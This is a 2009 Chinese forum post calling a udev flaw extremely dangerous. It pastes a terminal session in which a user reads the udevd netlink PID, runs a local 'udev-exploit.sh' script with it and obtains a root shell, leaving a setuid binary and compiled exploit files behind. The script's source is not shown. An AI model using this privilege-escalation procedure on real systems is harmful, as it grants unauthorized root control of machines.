|
发表于 2009-4-28 19:03:18
|
显示全部楼层
这是极高危漏洞的说
- d00m3d@BlackMesa:/tmp$ /sbin/udevd --version
- 128
- d00m3d@BlackMesa:/tmp$ ll
- total 4
- -rw-rw-r-- 1 d00m3d d00m3d 3367 Apr 28 17:23 udev-exploit.sh
- d00m3d@BlackMesa:/tmp$ ps ax|grep udev
- 578 ? S<s 0:00 /sbin/udevd --daemon
- 2147 pts/1 S+ 0:00 grep udev
- d00m3d@BlackMesa:/tmp$ cat /proc/net/netlink
- sk Eth Pid Groups Rmem Wmem Dump Locks Drops
- f7017200 0 0 00000000 0 0 (null) 2 0
- f70e0400 10 0 00000000 0 0 (null) 2 0
- f7137200 11 0 00000000 0 0 (null) 2 0
- f73eb400 15 577 00000001 0 0 (null) 2 0
- f703be00 15 0 00000000 0 0 (null) 2 0
- f70d1a00 16 0 00000000 0 0 (null) 2 0
- f70d1c00 18 0 00000000 0 0 (null) 2 0
- d00m3d@BlackMesa:/tmp$ sh ./udev-exploit.sh 577
- suid.c: In function 'main':
- suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
- cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
- \u@\h:\w$ whoami
- root
- \u@\h:\w$ id
- uid=0(root) gid=0(root) groups=12(video),15(cdrom),1000(d00m3d),1001(fuse),1002(nx)
- \u@\h:\w$ ls -l
- total 44
- -rwxrwxr-x 1 d00m3d d00m3d 2380 Apr 28 17:53 libno_ex.so.1.0
- -rw-rw-r-- 1 d00m3d d00m3d 232 Apr 28 17:53 program.c
- -rw-rw-r-- 1 d00m3d d00m3d 1360 Apr 28 17:53 program.o
- -rwsrwsr-x 1 root root 7172 Apr 28 17:53 suid
- -rw-rw-r-- 1 d00m3d d00m3d 80 Apr 28 17:53 suid.c
- -rwxrwxr-x 1 d00m3d d00m3d 8792 Apr 28 17:53 udev
- -rw-rw-r-- 1 d00m3d d00m3d 3367 Apr 28 17:23 udev-exploit.sh
- -rw-rw-r-- 1 d00m3d d00m3d 2216 Apr 28 17:53 udev.c
- \u@\h:\w$ groups
- root video cdrom d00m3d fuse nx
- \u@\h:\w$
复制代码 |
|